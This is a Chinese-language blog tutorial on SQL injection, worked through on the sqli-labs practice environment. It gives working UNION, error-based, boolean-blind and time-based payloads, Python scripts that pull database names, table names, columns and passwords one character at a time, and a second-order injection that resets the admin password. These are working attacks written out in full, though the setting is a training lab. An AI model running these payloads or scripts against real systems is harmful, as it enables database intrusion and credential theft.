
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <title>sql注入基础 | k-onlの狗窝</title>
    <meta name="author" content="k-onl" />
    <meta name="description" content="" />
    <meta name="keywords" content="" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
    <link rel="icon" href="/images/fufu1.jpg" />
    <link rel="preconnect" href="https://cdn.staticfile.org" />
<script src="https://cdn.staticfile.org/vue/3.3.7/vue.global.prod.min.js"></script>
<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/6.4.2/css/all.min.css" />
<link rel="preconnect" href="https://fonts.loli.net" />
<link rel="preconnect" href="https://gstatic.loli.net" crossorigin />
<link rel="stylesheet" href="https://fonts.loli.net/css2?family=Fira+Code:wght@400;500;600;700&family=Lexend:wght@400;500;600;700;800;900&family=Noto+Sans+SC:wght@400;500;600;700;800;900&display=swap" />
<script> const mixins = {}; </script>

<script src="https://polyfill.io/v3/polyfill.min.js?features=default"></script>




<script src="/js/lib/preview.js"></script>









<link rel="stylesheet" href="/css/main.css" />

<meta name="generator" content="Hexo 7.0.0"></head>
<body>
    <div id="layout">
        <transition name="fade">
            <div id="loading" v-show="loading">
                <div id="loading-circle">
                    <h2>LOADING</h2>
                    <p>加载过慢请开启缓存 浏览器默认开启</p>
                    <img src="/images/lolisister1.gif" />
                </div>
            </div>
        </transition>
        <div id="menu" :class="{ hidden: hiddenMenu, 'menu-color': menuColor}">
    <nav id="desktop-menu">
        <a class="title" href="/">
            <span>K-ONLの狗窝</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;Home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;About</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;搜索</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;Categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;Tags</span>
        </a>
        
    </nav>
    <nav id="mobile-menu">
        <div class="title" @click="showMenuItems = !showMenuItems">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;K-ONLの狗窝</span>
        </div>
        <transition name="slide">
            <div class="items" v-show="showMenuItems">
                
                <a href="/">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-house fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Home</div>
                    </div>
                </a>
                
                <a href="/about">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-id-card fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">About</div>
                    </div>
                </a>
                
                <a href="/archives">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-box-archive fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">搜索</div>
                    </div>
                </a>
                
                <a href="/categories">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-bookmark fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Categories</div>
                    </div>
                </a>
                
                <a href="/tags">
                    <div class="item">
                        <div style="min-width: 20px; max-width: 50px; width: 10%">
                            <i class="fa-solid fa-tags fa-fw"></i>
                        </div>
                        <div style="min-width: 100px; max-width: 150%; width: 20%">Tags</div>
                    </div>
                </a>
                
            </div>
        </transition>
    </nav>
</div>
<transition name="fade">
    <div id="menu-curtain" @click="showMenuItems = !showMenuItems" v-show="showMenuItems"></div>
</transition>

        <div id="main" :class="loading ? 'into-enter-from': 'into-enter-active'">
            <div class="article">
    <div>
        <h1>sql注入基础</h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <i class="fa-solid fa-calendar fa-fw"></i>
            </span>
            2023/12/20
        </span>
        
        
    </div>
    
    <div class="content" v-pre>
        <h2 id="sql注入类型"><a href="#sql注入类型" class="headerlink" title="sql注入类型"></a>sql注入类型</h2><p>B 基于布尔的盲注<br>T 基于时间的盲注<br>E 基于报错的注入<br>U 基于UNION的联合注入<br>S 基于多语句堆叠注入</p>
<h2 id="安装sqli并初始化"><a href="#安装sqli并初始化" class="headerlink" title="安装sqli并初始化"></a>安装sqli并初始化</h2><p>将sqli压缩包解压至小皮的网站根目录（WWW）下</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220203418109.png" alt="image-20231220203418109"></p>
<p>随后打开浏览器进入sqli</p>
<p>点击Setup&#x2F;reset Database for labs即可配置数据库 </p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220203446053.png" alt="image-20231220203446053"></p>
<p>出现这个页面表示初始化成功</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220203721711.png" alt="image-20231220203721711"></p>
<p>初始化返回后</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220203856388.png" alt="image-20231220203856388"></p>
<h2 id="安装Hackbar"><a href="#安装Hackbar" class="headerlink" title="安装Hackbar"></a>安装Hackbar</h2><p>与正常的拓展插件一样的插入方法一样，直接拖入或者选择导入</p>
<p>我这里使用火狐</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220204112885.png" alt="image-20231220204112885"></p>
<p>随意打开一个页面右键检查或者f12即可看到</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220204206891.png" alt="image-20231220204206891"></p>
<h2 id="sql注入步骤"><a href="#sql注入步骤" class="headerlink" title="sql注入步骤"></a>sql注入步骤</h2><h3 id="sql注入步骤1"><a href="#sql注入步骤1" class="headerlink" title="sql注入步骤1"></a>sql注入步骤1</h3><ul>
<li>找闭合</li>
</ul>
<p>闭合分为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">数字型：也就是没有闭合</span><br><span class="line">单引号闭合：使用单引号将关键字段闭合</span><br></pre></td></tr></table></figure>



<p>根据提示输入id</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220204845153.png" alt="image-20231220204845153"></p>
<p>得到一个正确的返回</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220204908242.png" alt="image-20231220204908242"></p>
<p>点击load url 将地址拷贝在当前输入框中，点击Execute执行</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220204952246.png" alt="image-20231220204952246"></p>
<p>可以看出是字符型sql注入（id被”包裹”）</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220205130119.png" alt="image-20231220205130119"></p>
<p>sql语句为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE id=&#x27;id&#x27; </span><br><span class="line">当我们将id的部分传入一个时1&#x27; or true -- -</span><br><span class="line">sql语句变为了SELECT * FROM users WHERE id=&#x27;1&#x27; or true -- -&#x27; </span><br><span class="line">执行条件变为了1或者任意（true）</span><br><span class="line">-- - 为注释后边的代码</span><br></pre></td></tr></table></figure>





<h3 id="sql注入步骤2"><a href="#sql注入步骤2" class="headerlink" title="sql注入步骤2"></a>sql注入步骤2</h3><ul>
<li>确认列的个数</li>
</ul>
<ol>
<li>使用grody by确定当前数据库的列数</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">使用order by来确定当前表的字段个数</span><br><span class="line">order by * 表示列出当前表的第*个字段</span><br></pre></td></tr></table></figure>

<p>我的表为6个字段</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220210211626.png" alt="image-20231220210211626"></p>
<p>当我输入order by 7时，出现错误</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220210247298.png" alt="image-20231220210247298"></p>
<ol start="2">
<li>确定返回值个数</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">union  select 1,2,3,4,5,6 //表示直接输出1 2 3 4 5 6</span><br><span class="line"></span><br><span class="line">select 1,2,3 表示直接输出1 2 3 这三个数字，可进行嵌套子查询</span><br><span class="line">如：select 1,(select concat(1,2,3)),3;</span><br><span class="line"></span><br><span class="line">//union表示在sql语句里插入一个查询语句</span><br><span class="line">//select后面数字的个数为使用order by确定的字段个数</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>select 1,(select concat(1,2,3)),3;查询结果为：</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231227200826521.png" alt="image-20231227200826521"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.2.190/sqli/Less-1/?id=88&#x27;  union  select 1,2,3 ,4,5,6-- -</span><br><span class="line">//id的值不能为正确的，否则会将返回值全部占用</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以确定返回值为两个，并且为第2位和第3位</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220211159158.png" alt="image-20231220211159158"></p>
<ul>
<li>看回显</li>
</ul>
<p>有数据回显用union联合注入，有报错用报错注入，有回显的东西但不是数据库数据的用布尔盲注，什么都没有的用睡眠注入</p>
<h1 id="接下来就可以进行通用sql注入方法了"><a href="#接下来就可以进行通用sql注入方法了" class="headerlink" title="接下来就可以进行通用sql注入方法了"></a>接下来就可以进行通用sql注入方法了</h1><h2 id="union联合注入"><a href="#union联合注入" class="headerlink" title="union联合注入"></a>union联合注入</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">//查询当前数据库下的所有表名</span><br><span class="line">select 1,group_concat(table_name) ,3,4,5,6 from information_schema.tables where table_schema=database();</span><br><span class="line">//这里将select1到6中的第2位进行了替换，因为只有第2位和第3位有回显</span><br><span class="line">// information_schema.tables where table_schema=database();表示查询当前数据库中的所有表</span><br><span class="line">//table_schema=database();	查询当前数据库</span><br><span class="line">//information_schema.tables查询表</span><br><span class="line">//group_concat(table_name)表示将查询结果使用字符串进行拼接（相当于只返回了一个结果集）</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//完整使用方法</span><br><span class="line">http://192.168.2.190/sqli/Less-1/?id=88&#x27;  union  select 1,group_concat(table_name) ,3,4,5,6 from information_schema.tables where table_schema=database(); -- -</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>可以看到输出了当前数据库下的所有表名</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220212028499.png" alt="image-20231220212028499"></p>
<p>从刚刚登录成功的页面可以知道表名为users</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220212514250.png" alt="image-20231220212514250"></p>
<ol start="4">
<li>得到所有字段名</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">//查询当前数据库下表名为’users‘的所有字段名</span><br><span class="line">select 1,group_concat(column_name) ,3,4,5,6 from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database();</span><br><span class="line"></span><br><span class="line">//table_schema=database();	查询当前数据库</span><br><span class="line">//table_name=&#x27;users&#x27; 		表名为users</span><br><span class="line">//information_schema.columns  查询所有字段</span><br><span class="line">//group_concat(table_name)表示将查询结果使用字符串进行拼接（相当于只返回了一个结果集）</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//完整使用方法</span><br><span class="line">http://192.168.2.190/sqli/Less-1/?id=88&#x27;  union  select 1,group_concat(column_name) ,3,4,5,6  from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=database(); -- -</span><br></pre></td></tr></table></figure>

<p>于是我们可以得到users表里所有的字段名</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220212730713.png" alt="image-20231220212730713"></p>
<ol start="6">
<li>获取字段里的数据</li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//查询当前表下字段的数据</span><br><span class="line">select 1,group_concat(id,&quot;~&quot;,username,&quot;~&quot;,password),3 from users;-- -</span><br><span class="line"></span><br><span class="line">//完整使用</span><br><span class="line">http://192.168.2.190/sqli/Less-1/?id=88&#x27;  union  select 1,group_concat(id,&quot;~&quot;,username,&quot;~&quot;,password),3 ,4,5,6 from users; -- -</span><br></pre></td></tr></table></figure>

<p>得到了id username password的所有数据</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220213720935.png" alt="image-20231220213720935"></p>
<p>数字型注入与字符型类似，区别为字符型注入时需要加引号  ’ ‘ 而数字型不需要</p>
<p>数字型：</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220214156737.png" alt="image-20231220214156737"></p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231220214121727.png" alt="image-20231220214121727"></p>
<h3 id="报错注入："><a href="#报错注入：" class="headerlink" title="报错注入："></a>报错注入：</h3><p>报错注入用在数据库的错误信息会回显在网页中的情况，如果联合查询不能使用，首选报错注入。报错注入利用的是数据库的报错信息得到数据库的内容，这里需要构造语句让数据库报错。</p>
<p>当输入正确的id时</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223221605661.png" alt="image-20231223221605661"></p>
<p>当输入的id为1‘时出现报错提示</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223221645066.png" alt="image-20231223221645066"></p>
<p>这时候就可以使用报错注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">使用方法：</span><br><span class="line">http://192.168.2.190/sqli/Less-5/?id=1&#x27;//根据sql语句加上正确的单引号双引号</span><br><span class="line"></span><br><span class="line">and //使用and连接后面的sql语句，表示前后都成立sql语句才成立</span><br><span class="line"></span><br><span class="line">(extractvalue(1,concat(0x7e,(select database()),0x7e)))-- -//报错注入语句，中间的select database()为想要爆出的信息，这里是数据库名</span><br><span class="line"></span><br><span class="line">//完整语句</span><br><span class="line">http://192.168.2.190/sqli/Less-5/?id=1&#x27;  and (extractvalue(1,concat(0x7e,(select database()),0x7e)))-- -</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223221947099.png" alt="image-20231223221947099"></p>
<p>其他的报错注入语句：（部分代码根据sql版本不同而无法使用）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">常用：</span><br><span class="line">(select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) 输出无限制，但会有一个随机数插入到回显中</span><br><span class="line"></span><br><span class="line">(extractvalue(1,concat(0x7e,(select user()),0x7e)))只输出显示32字节</span><br><span class="line"></span><br><span class="line">(updatexml(1,concat(0x7e,(select user()),0x7e),1))只输出显示32字节</span><br><span class="line"></span><br><span class="line">exp(~(select * from(select user())a))sql版本5.5~5.6</span><br><span class="line"></span><br><span class="line">不常用：</span><br><span class="line">geometrycollection((select * from(select * from(select user())a)b))</span><br><span class="line"></span><br><span class="line">multipoint((select * from(select * from(select user())a)b))</span><br><span class="line"></span><br><span class="line">polygon((select * from(select * from(select user())a)b))</span><br><span class="line"></span><br><span class="line">multipolygon((select * from(select * from(select user())a)b))</span><br><span class="line"></span><br><span class="line">linestring((select * from(select * from(select user())a)b))</span><br><span class="line"></span><br><span class="line">multilinestring((select * from(select * from(select user())a)b))</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="布尔盲注："><a href="#布尔盲注：" class="headerlink" title="布尔盲注："></a>布尔盲注：</h3><p>当我们使用正确的id时：输出you are in</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223222815787.png" alt="image-20231223222815787"></p>
<p>当使用不存在的id时：没有回显</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223222927422.png" alt="image-20231223222927422"></p>
<p>这时候就可以用布尔盲注</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223222738129.png" alt="image-20231223222738129"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">and ascii(substring(database(),1,1))//将数据库的第一个字母进行转码，</span><br><span class="line">//完整：</span><br><span class="line">http://192.168.2.190/sqli/Less-8/?id=1&#x27; and ascii(substring(database(),1,1))</span><br></pre></td></tr></table></figure>



<p>使用python编写脚本进行盲注：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//获取url  id=1’是因为sql语句d是单引号</span><br><span class="line">url1=&quot;http://192.168.2.190/sqli/Less-8/?id=1&#x27; &quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def ku():</span><br><span class="line">    name=&#x27;&#x27;</span><br><span class="line">    print(&#x27;库执行中&#x27;)</span><br><span class="line">    for i in range(1,50):</span><br><span class="line">        low=32</span><br><span class="line">        height=127</span><br><span class="line">        tem=(low+height)//2</span><br><span class="line">        while low&lt;height:</span><br><span class="line">        //将数据库的第i个字母进行转码</span><br><span class="line">            url=url1+f&quot; and ascii(substring(database(),&#123;i&#125;,1))&gt;&#123;tem&#125;-- -&quot;</span><br><span class="line">            re=requests.get(url)</span><br><span class="line">            if &#x27;You are in&#x27; in re.text:</span><br><span class="line">                low=tem+1</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">            else:</span><br><span class="line">                height=tem</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">        if tem==32:</span><br><span class="line">            break</span><br><span class="line">        name+=chr(tem)</span><br><span class="line">    print(name)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def table():</span><br><span class="line">    name=&#x27;&#x27;</span><br><span class="line">    print(&#x27;表执行中&#x27;)</span><br><span class="line">    for i in range(1,100):</span><br><span class="line">        low=32</span><br><span class="line">        height=127</span><br><span class="line">        tem=(low+height)//2</span><br><span class="line">        while low&lt;height:</span><br><span class="line">            url=url1+f&quot; and ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema=database()),&#123;i&#125;,1))&gt;&#123;tem&#125;-- -&quot;</span><br><span class="line">            re=requests.get(url)</span><br><span class="line">            if &#x27;You are in&#x27; in re.text:</span><br><span class="line">                low=tem+1</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">            else:</span><br><span class="line">                height=tem</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">        if tem==32:</span><br><span class="line">            break</span><br><span class="line">        name+=chr(tem)</span><br><span class="line">    print(name)</span><br><span class="line"></span><br><span class="line">def lie():</span><br><span class="line">    name=&#x27;&#x27;</span><br><span class="line">    print(&#x27;列执行中&#x27;)</span><br><span class="line">    for i in range(1,200):</span><br><span class="line">        low=32</span><br><span class="line">        height=127</span><br><span class="line">        tem=(low+height)//2</span><br><span class="line">        while low&lt;height:</span><br><span class="line">            url=url1+f&quot; and ascii(substring((select group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;  and table_schema=database()),&#123;i&#125;,1))&gt;&#123;tem&#125;-- -&quot;</span><br><span class="line">            re=requests.get(url)</span><br><span class="line">            if &#x27;You are in&#x27; in re.text:</span><br><span class="line">                low=tem+1</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">            else:</span><br><span class="line">                height=tem</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">        if tem==32:</span><br><span class="line">            break</span><br><span class="line">        name+=chr(tem)</span><br><span class="line">    print(name)</span><br><span class="line"></span><br><span class="line">def shuju():</span><br><span class="line">    name=&#x27;&#x27;</span><br><span class="line">    print(&#x27;数据执行中&#x27;)</span><br><span class="line">    for i in range(1,200):</span><br><span class="line">        low=32</span><br><span class="line">        height=127</span><br><span class="line">        tem=(low+height)//2</span><br><span class="line">        while low&lt;height:</span><br><span class="line">            url=url1+f&quot; and ascii(substring((select group_concat(password) from  users ),&#123;i&#125;,1))&gt;&#123;tem&#125;-- -&quot;</span><br><span class="line">            re=requests.get(url)</span><br><span class="line">            if &#x27;You are in&#x27; in re.text:</span><br><span class="line">                low=tem+1</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">            else:</span><br><span class="line">                height=tem</span><br><span class="line">                tem=(low+height)//2</span><br><span class="line">        if tem==32:</span><br><span class="line">            break</span><br><span class="line">        name+=chr(tem)</span><br><span class="line">    print(name)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ku()</span><br><span class="line">table()</span><br><span class="line">lie()</span><br><span class="line">shuju()</span><br><span class="line">print(&#x27;执行完成&#x27;)</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223223647074.png" alt="image-20231223223647074"></p>
<h3 id="时间注入（睡眠注入）："><a href="#时间注入（睡眠注入）：" class="headerlink" title="时间注入（睡眠注入）："></a>时间注入（睡眠注入）：</h3><p>无论输入什么都只回显同一个you are in，这时候就无法进行布尔盲注</p>
<p>只能通过睡眠时间进行判断当前的字母是否正确</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">and if(ascii(substr(database(),&#123;i&#125;,1))=&#123;j&#125;,sleep(3),1)--  -//将数据库的第一个字母进行转码，如果正确就睡眠3秒</span><br><span class="line">SELECT BENCHMARK(5000000, SHA1(&#x27;Hello World&#x27;));</span><br><span class="line">//完整：</span><br><span class="line">http://192.168.2.190/sqli/Less-9/?id=1&#x27; and if(ascii(substr(database(),&#123;i&#125;,1))=&#123;j&#125;,sleep(3),1)--  -</span><br></pre></td></tr></table></figure>

<p>完整代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">def ku():</span><br><span class="line">    n=&#x27;&#x27;</span><br><span class="line">    print(&#x27;库执行中&#x27;)</span><br><span class="line">    for i in range(1,10):</span><br><span class="line">        for j in range(32,123):</span><br><span class="line">            </span><br><span class="line">            url=url1+f&quot; and if(ascii(substr(database(),&#123;i&#125;,1))=&#123;j&#125;,sleep(3),1)--  -&quot;</span><br><span class="line">          </span><br><span class="line">            start_time = time.time()  # 记录开始时间</span><br><span class="line">            re = requests.get(url)</span><br><span class="line">            end_time = time.time()</span><br><span class="line"></span><br><span class="line">            if end_time - start_time &gt; 3:</span><br><span class="line">                n = n+chr(j)</span><br><span class="line">                print(n)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h3><p> 二次注入可以理解为，攻击者构造的恶意数据存储在数据库后，恶意数据被读取并进入到 SQL 查询语句所导致的注入。防御者可能在用户输入恶意数据时，对其中的特殊字符进行了转义处理；但在恶意数据插入到数据库时，被处理的数据又被还原并存储在数据库中，当 Web 程序调用存储在数据库中的恶意数据并执行 SQL 查询时，就发生了 SQL 二次注入。</p>
<p>（1）查看初始 users 表，发现初始 users 表中账号 admin 的密码为 admin</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224509176.png" alt="image-20231223224509176"><br>（2）注册用户，在网站注册名为 admin’– - 密码为 123456 的用户</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224519714.png" alt="image-20231223224519714"><br>（3）修改用户密码，我们先查看一下此时的 users 表，发现多了一个用户 admin’– -，</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224532749.png" alt="image-20231223224532749"><br>修改用户 admin’– - 的密码</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224539961.png" alt="image-20231223224539961"><br>再一次查看 users 表，发现用户 admin‘– - 的密码并没有被修改，而是用户 admin 的密码被修改了。于是我们就有了 admin 的账户密码。</p>
<p><img src="https://cdn.jsdelivr.net/gh/k-onl/image@main//myimage/image-20231223224546095.png" alt="image-20231223224546095"><br>原因：在网站设计时，虽然过滤了注册的信息，把特殊字符进行了转义，但是在从数据库调用从外部保存下来的数据时，并没有进行过滤，使得“admin’– -”被代入到 sql 语句执行，执行了这段 payload，达到了修改用户 admin 的密码的目的</p>
